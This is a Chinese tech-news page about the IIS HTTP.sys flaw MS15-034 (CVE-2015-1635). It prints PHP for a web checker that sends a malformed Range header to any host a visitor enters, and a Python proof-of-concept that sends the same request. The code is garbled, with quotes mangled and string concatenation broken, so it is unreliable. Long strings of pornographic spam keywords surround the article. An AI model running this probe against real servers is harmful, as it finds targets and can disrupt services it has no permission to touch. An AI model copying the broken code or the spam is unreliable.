精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

IIS最新高危漏洞POC及在線檢測源碼

安全 漏洞
遠程執行代碼漏洞存在于 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。

HTTP.sys遠程執行代碼漏洞(CVE-2015-1635,MS15-034)

IIS最新高危漏洞POC及在線檢測源碼

遠程執行代碼漏洞存在于 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者可以在系統帳戶的上下文中執行任意代碼。https://technet.microsoft.com/zh-cn/library/security/MS15-034

在線檢測源碼

IIS最新高危漏洞POC及在線檢測源碼 

  1. <?php 
  2.  
  3.  
  4. class VulnStatus  
  5. {  
  6. const FAIL        = 0;  
  7. const VULN        = 1;  
  8. const VULN_NOT_MS = 2;  
  9. const PATCHED     = 3;  
  10. const NOT_VULN    = 4;  
  11. const NOT_VULN_MS = 5;  
  12. const NOT_VULN_CF = 6;  
  13.  
  14. public static function AsString( $status, $host )  
  15. {  
  16. switch( $status )  
  17. {  
  18. case self::FAIL       : return ';<div class="alert alert-warning">無法連接到 <b>'; . $host . ';</b> 測試漏洞。</div>';;  
  19. case self::VULN       : return ';<div class="alert alert-danger"><b>'; . $host . ';</b> 存在漏洞。</div>';;  
  20. case self::VULN_NOT_MS: return ';<div class="alert alert-warning"><b>'; . $host . ';</b> 可能存在漏洞,但它好像沒使用IIS。</div>';;  
  21. case self::PATCHED    : return ';<div class="alert alert-success"><b>'; . $host . ';</b> 已修復。</div>';;  
  22. case self::NOT_VULN   : return ';<div class="alert alert-info">不能識別補丁狀態 <b>'; . $host . ';</b>, 并沒有使用IIS,可能不存在漏洞。</div>';;  
  23. case self::NOT_VULN_MS: return ';<div class="alert alert-info">不能識別補丁狀態 <b>'; . $host . ';</b>. 可能不存在漏洞。</div>';;  
  24. case self::NOT_VULN_CF: return ';<div class="alert alert-success"><b>'; . $host . ';</b> 可能使用了CloudFlare CDN加速,導致漏洞無法檢測或不存在。</div>';;  
  25. }  
  26.  
  27. return ';好像壞了';;  
  28. }  
  29. }  
  30.  
  31. $host = false;  
  32. $status = false;  
  33. $url = filter_input( INPUT_GET, ';host';, FILTER_SANITIZE_URL );  
  34.  
  35. if( !empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )  
  36. {  
  37. $url = ';http://'; . $url;  
  38. }  
  39.  
  40. $port = parse_url( $url, PHP_URL_PORT );  
  41.  
  42. if( $port === null )  
  43. {  
  44. $port = 80;  
  45. }  
  46.  
  47. $url = parse_url( $url, PHP_URL_HOST );  
  48.  
  49. if( $url !== null )  
  50. {  
  51. $cachekey = ';ms15034_'; . $url . ';_'; . $port;  
  52. $cachetime = 300; // 5 minutes  
  53.  
  54. $host = htmlspecialchars( $url, ENT_HTML5 );  
  55.  
  56. if( $port !== 80 )  
  57. {  
  58. $host .';:'; . $port;  
  59. }  
  60.  
  61. $memcached = new Memcached( );  
  62. $memcached->addServer( ';/var/run/memcached/memcached.sock';, 0 );  
  63.  
  64. $status = $memcached->get( $cachekey );  
  65.  
  66. if( $status === false )  
  67. {  
  68. $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );  
  69.  
  70. if( $fp === false )  
  71. {  
  72. $status = VulnStatus::FAIL;  
  73. }  
  74. else  
  75. {  
  76. stream_set_timeout( $fp, 5 );  
  77.  
  78. $header = "GET / HTTP/1.1\r\n";  
  79. $header ."Host: stuff\r\n";  
  80. $header ."Range: bytes=0-18446744073709551615\r\n";  
  81. $header ."Connection: close\r\n\r\n";  
  82.  
  83. fwrite( $fp, $header );  
  84.  
  85. $response = fread( $fp, 1024 );  
  86.  
  87. fclose( $fp );  
  88.  
  89. if( strpos( $response, ';您的請求范圍不符合'; ) !== false )  
  90. {  
  91. $status = strpos( $response, ';Microsoft'; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;  
  92. }  
  93. else if( strpos( $response, ';請求一個無效的header頭部'; ) !== false )  
  94. {  
  95. $cachetime = 3600; // 緩存時間  
  96. $status = VulnStatus::PATCHED;  
  97. }  
  98. else if( strpos( $response, ';Microsoft'; ) === false )  
  99. {  
  100. if( strpos( $response, ';403 Forbidden'; ) !== false && strpos( $response, ';cloudflare-nginx'; ) !== false )  
  101. {  
  102. $status = VulnStatus::NOT_VULN_CF;  
  103. }  
  104. else  
  105. {  
  106. $status = VulnStatus::NOT_VULN;  
  107. }  
  108. }  
  109. else  
  110. {  
  111. $status = VulnStatus::NOT_VULN_MS;  
  112. }  
  113. }  
  114.  
  115. unset( $fp, $header, $response );  
  116.  
  117. $memcached->set( $cachekey, $status, $cachetime );  
  118. }  
  119.  
  120. $status = VulnStatus::AsString( $status, $host );  
  121. }  
  122. ?> 
  123. <!DOCTYPE HTML> 
  124. <html> 
  125. <head> 
  126. <meta charset="utf-8"> 
  127. <meta name="theme-color" content="#424242"> 
  128. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
  129. <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  130.  
  131. <title>MS15-034 測試</title> 
  132.  
  133. <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet"> 
  134.  
  135. <style type="text/css"> 
  136. .container {  
  137. max-width: 900px;  
  138. }  
  139.  
  140. .masthead {  
  141. position: relative;  
  142. padding: 20px 0;  
  143. text-align: center;  
  144. color: #fff;  
  145. background-color: #424242;  
  146. margin-bottom: 20px;  
  147. }  
  148.  
  149. .masthead a {  
  150. color: #fff;  
  151. }  
  152.  
  153. .footer {  
  154. text-align: center;  
  155. padding: 15px;  
  156. color: #555;  
  157. }  
  158.  
  159. .footer span {  
  160. color: #FA5994;  
  161. }  
  162.  
  163. .form-inline {  
  164. text-align: center;  
  165. margin-bottom: 20px;  
  166. }  
  167.  
  168. .github {  
  169. position: absolute;  
  170. top: 0;  
  171. right: 0;  
  172. }  
  173. </style> 
  174. </head> 
  175. <body> 
  176. <div> 
  177. <div> 
  178. <h1>HTTP.sys 堆棧漏洞測試</h1> 
  179. <h3>輸入一個URL或主機名來測試服務器的 <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.</h3> 
  180. </div> 
  181. </div> 
  182.  
  183.  
  184.  
  185. <div> 
  186. <blockquote> 
  187. <p>在HTTP協議棧(HTTP.sys)造成當HTTP協議堆棧不正確地分析特制的HTTP請求的遠程代碼執行漏洞。成功利用此漏洞誰的攻擊者可以在系統帳戶的上下文中執行任意代碼。</p> 
  188. <p>要利用此漏洞,攻擊者必須發送一個特制的HTTP請求發送到受影響的系統。此更新通過修改Windows HTTP協議棧處理請求解決該漏洞。</p> 
  189. </blockquote> 
  190.  
  191. <form id="js-form" method="GET"> 
  192. <div> 
  193. <input type="text" class="form-control input-lg" id="js-input" placeholder="baidu.com" name="host" autofocus<?php if( $host !== false ) { echo '; value="'; . $host . ';"';; } ?>> 
  194. <button type="submit" class="btn btn-primary btn-lg">檢測</button> 
  195. </div> 
  196. </form> 
  197.  
  198. <?php if( $status !== false ) { echo $status; } ?> 
  199.  
  200. <div>使用Memcached分布式內存對象緩存系統 | 所有的結果查詢會被緩存五分鐘</div> 
  201. </div> 
  202. </body> 
  203. </html> 

漏洞驗證POC

python版

  1. #!/usr/bin/env python  
  2. __author__ = ';jastra';  
  3. class bg_colors:  
  4.     VULN = ';33[92m';  
  5.     NONVULN= ';33[95m';  
  6.     EXPLOIT = ';33[91m';    
  7. try:  
  8.     import requests  
  9.     import re  
  10. except ImportError as ierr:  
  11.     print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)  
  12.       
  13. def identify_iis(domain):  
  14.     req = requests.get(str(domain))  
  15.     remote_server = req.headers[';server';]  
  16.           
  17.     if "Microsoft-IIS" in remote_server:  
  18.         print(bg_colors.VULN + "[+] 服務是 " + remote_server)   
  19.         ms15_034_test(str(domain))  
  20.     else:  
  21.         print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)   
  22.           
  23. def ms15_034_test(domain):  
  24.     print(" 啟動vuln檢查!")  
  25.     vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";  
  26.     req = requests.get(str(domain), params=vuln_buffer)  
  27.     if req.headers[';content';] == "請求范圍不符合":  
  28.         print(bg_colors.EXPLOIT + "[+] 存在漏洞")  
  29.     else:  
  30.         print(bg_colors.EXPLOIT + "[-] IIS服務無法顯示漏洞是否存在. "+  
  31.                "需要手動檢測")  
  32. usr_domain = raw_input("輸入域名掃描: ")  
  33. identify_iis(usr_domain) 

 

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2009-02-04 11:24:12

2015-07-13 09:18:20

2022-03-09 13:25:21

臟管道Linux 內核漏洞

2011-03-21 10:46:04

2013-07-18 15:09:27

2022-05-27 12:51:46

漏洞VMware攻擊者

2013-07-11 09:25:49

2025-09-18 10:05:45

2023-11-08 13:34:13

2025-09-08 10:04:46

2020-03-25 09:40:57

微軟瀏覽器Windows

2021-11-10 11:51:33

BrakTooth安全漏洞藍牙設備

2023-04-07 09:12:11

2012-03-12 17:23:45

2025-01-02 14:21:20

2020-11-04 14:55:06

谷歌GitHub漏洞

2023-04-12 21:28:40

2011-08-15 15:41:29

2015-04-22 16:06:23

社保信息泄漏

2016-11-08 19:44:08

點贊
收藏

51CTO技術棧公眾號

四虎国产精品免费久久5151| 黄色在线视频观看网站| 99久久这里只有精品| 欧美日韩高清一区二区三区| eeuss中文| 免费成人在线看| 久久久久久色| 日韩在线观看av| 国产xxxx视频| 亚洲成人av观看| 有码一区二区三区| 欧美婷婷久久| 精品一级少妇久久久久久久| 白嫩白嫩国产精品| 欧美性受xxxx| 久久av综合网| 超碰免费在线| 成人午夜视频在线| 国产精品一区二区久久精品 | av免费在线一区| 亚洲免费观看高清完整版在线观看 | 欧洲美女女同性互添| 特黄aaaaaaaaa真人毛片| 99国产一区| 在线观看国产欧美| 成年女人免费视频| 成人在线免费电影网站| 亚洲第一av色| 亚洲欧洲日韩精品| 天天操天天插天天射| 精品一区在线看| 欧美亚洲第一区| 国产大片免费看| 欧美日韩国产高清电影| 亚洲韩国日本中文字幕| 一区二区在线播放视频| 91超碰在线播放| 成人免费一区二区三区视频| 欧美日韩亚洲一区二区三区在线观看 | 日韩中出av| 日韩女优视频免费观看| 国产一伦一伦一伦| 美女写真久久影院| 日韩欧美在线免费观看| 日韩亚洲欧美视频| 亚洲精品一线| 亚洲精品欧美二区三区中文字幕| 久久伦理网站| 无码精品黑人一区二区三区| 国产suv一区二区三区88区| 国产日韩在线一区| 中国a一片一级一片| 亚洲综合国产激情另类一区| 久久久久久12| 国产在线观看成人| 国产一区激情| 欧美激情va永久在线播放| 手机在线免费看片| 久久久久久美女精品| 视频直播国产精品| 天堂av免费在线| 日韩理论电影院| 中文字幕日韩在线观看| 在线免费看视频| 日韩理论电影| 久久精品青青大伊人av| 欧美性x x x| 亚洲精品小说| 欧美日韩国产999| 久久久久久av无码免费网站| 欧美黄污视频| 久久全球大尺度高清视频| 久久久一二三区| 日韩视频久久| 欧美亚洲国产另类| 一级黄色av片| 六月丁香综合在线视频| 国产一区二区在线播放| a级片免费观看| 国产成人日日夜夜| 精品国产乱码久久久久久蜜柚| 天天干,夜夜操| 2024国产精品| 亚洲欧美精品| 午夜小视频在线观看| 亚洲mv大片欧洲mv大片精品| 精品国产成人av在线免| av成人在线看| 日韩精品一区二区三区视频播放 | 不卡视频一区| 天堂在线免费av| 欧美激情一区二区三区| 强开小嫩苞一区二区三区网站| 日本孕妇大胆孕交无码| 疯狂做受xxxx欧美肥白少妇 | 黄色精品视频在线观看| 欧美午夜不卡| 国产成人久久久| 国产麻豆免费视频| 99久久婷婷国产综合精品电影| 欧美日韩综合网| 26uuu亚洲电影在线观看| 欧美日韩国产综合视频在线观看中文| 激情综合网俺也去| 一区二区三区国产好| 亚洲美女久久久| 污污的视频在线免费观看| 亚洲激精日韩激精欧美精品| 青青久久av北条麻妃黑人| 国产精品区在线观看| 99久久精品情趣| 国产精品99久久久久久大便| 国产在线88av| 8x福利精品第一导航| a天堂视频在线观看| 日韩综合在线| 欧美有码在线视频| 精品国产伦一区二区三| 久久这里只有精品视频网| 中文字幕第一页亚洲| 自拍偷拍亚洲视频| 日韩视频一区二区三区在线播放 | 免费看黄色a级片| 久久久一本精品| 精品国产一区久久| 国产麻豆a毛片| 玖玖国产精品视频| 国产精品美女诱惑| 大地资源网3页在线观看| 色狠狠av一区二区三区| 日本69式三人交| 欧美va天堂在线| 国产精自产拍久久久久久| 欧美xxx.com| 亚洲不卡一区二区三区| 欧洲在线免费视频| 日韩理论片av| 国产成人精品视频在线| 香蕉视频国产在线| 亚洲国产精品一区二区www| 亚洲视频第二页| 国产亚洲一区二区三区啪| 国产69久久精品成人| 亚洲av无码乱码国产精品久久 | 亚洲xxxx3d动漫| 七七婷婷婷婷精品国产| 日本最新一区二区三区视频观看| 国产免费拔擦拔擦8x高清在线人| 亚洲精品在线免费播放| 欧美激情一区二区视频| 国产一区二区三区精品视频| 亚洲一区二区三区精品视频| 日韩成人动漫| 亚洲欧美精品中文字幕在线| 六月丁香婷婷综合| 91小视频在线| 中文字幕日韩精品无码内射| 欧美啪啪网站| xxx成人少妇69| 中文字幕乱码视频| 中文一区在线播放| 奇米影视四色在线| 久久精品99久久无色码中文字幕| 国产精品久久久久久五月尺 | 日韩在线不卡视频| 国产精品久久婷婷| 一区二区三区在线高清| 欧美熟妇精品一区二区| 狠狠爱成人网| 国产综合精品一区二区三区| 欧美亚洲日本精品| 亚洲欧美中文日韩在线| 国产三级理论片| 亚洲欧洲国产日韩| 中文字幕第六页| 精品白丝av| 久久综合一区| 素人一区二区三区| 久久亚洲精品国产亚洲老地址| 国产又粗又长又大视频| 国产精品私人影院| 99999精品| 亚洲黄色免费| 视频一区二区三| 国产一区二区在线观| 久久男人av资源网站| 国产精品秘入口| 欧美一区在线视频| 欧美日韩精品区| 中文字幕成人在线观看| 少妇丰满尤物大尺度写真| 99日韩精品| 亚洲欧洲一区二区福利| aaa国产精品| 国产精品国产亚洲伊人久久| av中文字幕在线播放| 亚洲国产精品va在线观看黑人| 狠狠人妻久久久久久| 国产精品第13页| 中国一级特黄录像播放| 日韩不卡在线观看日韩不卡视频| 国产精品无码乱伦| 任你躁在线精品免费| 国产精品视频自在线| а√中文在线8| 亚洲欧美国产精品| 国产高中女学生第一次| 色久综合一二码| 动漫精品一区一码二码三码四码| 国产日韩欧美精品电影三级在线| 成人三级做爰av| 三级久久三级久久| 91九色丨porny丨国产jk| 第一会所亚洲原创| 国产一区二区在线观看免费播放| 国产精品一区二区免费福利视频| 久久全球大尺度高清视频| 日本福利专区在线观看| 精品视频在线导航| 国内老熟妇对白xxxxhd| 欧美综合亚洲图片综合区| 国产无遮挡aaa片爽爽| 亚洲天堂久久久久久久| 国产传媒国产传媒| 99视频在线精品| 无码国产精品一区二区高潮| 捆绑变态av一区二区三区| 亚洲欧洲日产国码无码久久99| 中文字幕一区二区av| 亚洲不卡1区| 蜜臀av免费一区二区三区| 成人av男人的天堂| 成人免费观看49www在线观看| 欧美中文字幕在线观看| 国产啊啊啊视频在线观看| 日韩中文字幕在线| av电影在线观看| 日韩激情片免费| 好吊色一区二区三区| 91精品国产品国语在线不卡| 一区精品在线观看| 欧洲一区二区av| 亚洲成熟少妇视频在线观看| 精品欧美国产一区二区三区| 五月天婷婷网站| 一区二区三区在线观看欧美 | 亚洲午夜视频在线| 国语对白在线播放| 中文字幕一区二区三区色视频| 免费视频91蜜桃| 久久精品一区二区三区av| 素人fc2av清纯18岁| 91在线视频免费91| 人体私拍套图hdxxxx| av一区二区三区四区| 91玉足脚交白嫩脚丫| 成人性色生活片免费看爆迷你毛片| 女同性αv亚洲女同志| 粉嫩av一区二区三区| 美女伦理水蜜桃4| 成人av网站在线| 欧产日产国产精品98| 91免费看`日韩一区二区| 黄色国产在线观看| 久久久精品国产免大香伊| www在线观看免费视频| 欧美国产一区在线| 免费黄色国产视频| 亚洲三级在线看| 久热这里只有精品在线| 红桃视频成人在线观看| 天天综合天天干| 在线观看中文字幕不卡| 一级特黄aaa大片| 欧美一区国产二区| 免费观看的毛片| 精品亚洲一区二区三区在线观看| 黄色大片在线看| 中文字幕久久久| 麻豆视频免费在线观看| 欧美国产中文字幕| 综合另类专区| 国产欧美日韩最新| 成人知道污网站| 精品国产乱码久久久久软件| 国语产色综合| 欧美性受xxxx黑人猛交88| 亚洲人妖在线| www.色就是色| 国产xxx精品视频大全| 四虎永久免费在线观看| 亚洲天堂中文字幕| 久久久久久久久久久久久久av| 欧美色综合影院| 亚洲国产精品二区| 亚洲人成电影网站色www| 成人黄视频在线观看| 97超级碰碰人国产在线观看| 国产精品第一国产精品| 国产欧美日韩综合一区在线观看| 国产精品亚洲二区| 国产精品免费看久久久无码| 久久久国产亚洲精品| 国产xxxxhd| 2020国产成人综合网| 欧美成人三级在线观看| 日韩欧美国产中文字幕| 国产成人久久精品77777综合| 亚洲欧美日韩综合| 欧美黄色视屏| 国产精品一区二区三| 国产福利资源一区| 中文精品一区二区三区| 欧美一级视频| 美女伦理水蜜桃4| 国产精品大尺度| 69国产精品视频免费观看| 日韩一区二区在线看| 成人免费在线观看| 97视频免费看| 日韩精品一区二区三区中文在线 | 911美女片黄在线观看游戏| 日韩av在线精品| 特级毛片在线| 国产欧亚日韩视频| 国产乱码精品一区二区亚洲| 日韩欧美精品免费| 国产精品一二三区在线| 国产福利在线导航| 色婷婷国产精品久久包臀| 丁香六月色婷婷| 久久在线视频在线| 99riav视频一区二区| 欧美污视频久久久| 性感少妇一区| 午夜男人的天堂| 夜夜嗨av一区二区三区网页| 91中文字幕在线播放| 亚洲图片欧洲图片av| 高潮一区二区| 欧美国产一二三区| 国产亚洲午夜| jizz欧美性20| 福利视频第一区| 天堂在线中文网| 久久免费观看视频| 亚洲91网站| 精品视频在线观看一区二区| 国产精品一区二区三区乱码| 极品美妇后花庭翘臀娇吟小说| 欧美性高清videossexo| 国产裸舞福利在线视频合集| 日本亚洲欧美三级| 国产一区日韩| 九九热在线免费| 欧美国产1区2区| 亚洲男人天堂网址| 中文字幕欧美日韩| 少妇高潮一区二区三区99| 中文网丁香综合网| 国产一区二区美女| 51精品免费网站| 日韩视频一区二区| 国产拍在线视频| 日韩av一区二区三区在线| 人禽交欧美网站| 国产3级在线观看| 欧美一区二区视频免费观看| 羞羞网站在线看| 国内一区二区三区在线视频| 夜久久久久久| 谁有免费的黄色网址| 欧美日韩综合在线| 黄网址在线观看| 99久久无色码| 亚洲深夜激情| 国精产品一区二区三区| 欧美日韩电影在线播放| 中文字幕中文字幕在线十八区| 成人午夜影院在线观看| 亚洲一区日韩| 国产精品国产三级国产专业不 | 亚洲高清视频网站| 97超碰国产精品女人人人爽| 国产一区二区三区天码| 中文字幕中文在线| 亚洲国产精品欧美一二99| 美女做暖暖视频免费在线观看全部网址91| 日本不卡高字幕在线2019| 99久久精品费精品国产| av天堂一区二区| 色999日韩国产欧美一区二区| 免费人成在线观看播放视频| 成人黄动漫网站免费| 久久精品人人做人人爽电影蜜月| 男人av资源站| 日韩成人中文字幕在线观看| 美女久久久久久| 青青青国产在线观看| 国产精品乱人伦|